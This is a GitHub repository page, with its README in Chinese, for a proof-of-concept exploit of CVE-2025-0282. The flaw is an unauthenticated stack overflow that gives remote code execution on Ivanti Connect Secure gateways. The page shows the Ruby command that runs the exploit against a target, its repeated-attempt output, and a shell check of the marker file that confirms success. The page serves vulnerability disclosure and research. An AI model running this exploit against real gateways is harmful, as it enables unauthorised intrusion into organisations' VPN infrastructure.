sfewer-r7/CVE-2025-0282

GitHub: sfewer-r7/CVE-2025-0282

针对CVE-2025-0282漏洞的概念验证代码,通过栈溢出实现对Ivanti网关设备的远程未认证代码执行。

Stars: 49 | Forks: 11

# CVE-2025-0282 PoC _影响 Ivanti Connect Secure、Ivanti Policy Secure 和 Ivanti Neurons for ZTA 网关的远程未认证栈缓冲区溢出漏洞_ ## 概述 这是一个概念验证 exploit,用于演示 [CVE-2025-0282](https://attackerkb.com/topics/WzjO6MNGY3/cve-2025-0282) 的利用过程,基于 [watchTowr](https://labs.watchtowr.com/exploitation-walkthrough-and-techniques-ivanti-connect-secure-rce-cve-2025-0282) 发布的利用策略。 此 PoC 包含针对 Ivanti Connect Secure 22.7r2.4 构建的 ROP 链。若不先为目标版本构建相应的 ROP 链,则无法针对任何其他版本。 此 PoC 包含一个 payload,将执行操作系统命令并在目标系统上创建一个临时文件。这是确认 exploit 成功的方式。代码执行是以非 root 用户 `nr` 的权限实现的。 ## 用法 我们可以针对易受攻击的 Ivanti Connect Secure 目标(版本 22.7r2.4)运行此脚本,如下所示: ``` C:\Users\sfewer\Desktop\CVE-2025-0282>ruby CVE-2025-0282.rb -t 192.168.86.111 -p 443 [+] Targeting 192.168.86.111:443 [+] Detected version 22.7.2.3597 [2025-01-16 14:39:56 +0000] Starting... [2025-01-16 14:39:56 +0000] Triggering #1... [2025-01-16 14:39:57 +0000] Triggering #2... [2025-01-16 14:40:08 +0000] Triggering #3... [2025-01-16 14:40:19 +0000] Triggering #4... [2025-01-16 14:40:30 +0000] Triggering #5... ...snip... [2025-01-16 15:13:28 +0000] Triggering #188... [2025-01-16 15:13:38 +0000] Triggering #189... [2025-01-16 15:13:49 +0000] Triggering #190... [2025-01-16 15:14:00 +0000] Triggering #191... ``` 如果 exploit 成功,它将在临时目录 `/var/tmp/` 中写入一个新文件,文件名中包含对应于 exploit 尝试迭代的数字值。 在目标设备上的一个单独 root shell 中(我们通过对设备进行越狱建立),我们可以观察 exploit 何时成功: ``` bash-4.2# ls -al /var/tmp/hax* ls -al /var/tmp/hax* ls: cannot access /var/tmp/hax*: No such file or directory bash-4.2# ls -al /var/tmp/hax* ls -al /var/tmp/hax* -rw-r--r-- 1 nr nr 0 Jan 16 07:10 /var/tmp/haxor_191 bash-4.2# ``` 从这个例子中我们可以看到,exploit 进行了 190 次失败的尝试,并在第 191 次尝试时取得成功。因此在这个例子中,对该目标的利用在 34 分钟内完成。
标签:CISA项目, CVE-2025-0282, Exploit, Ivanti, Ivanti Connect Secure, Ivanti Neurons for ZTA, Ivanti Policy Secure, Maven, PoC, RCE, ROP链, Ruby, VPN漏洞, Web报告查看器, 暴力破解, 未授权访问, 栈缓冲区溢出, 漏洞验证, 知识库, 缓冲区溢出, 编程工具, 网关安全, 网络安全, 远程代码执行, 隐私保护, 零日漏洞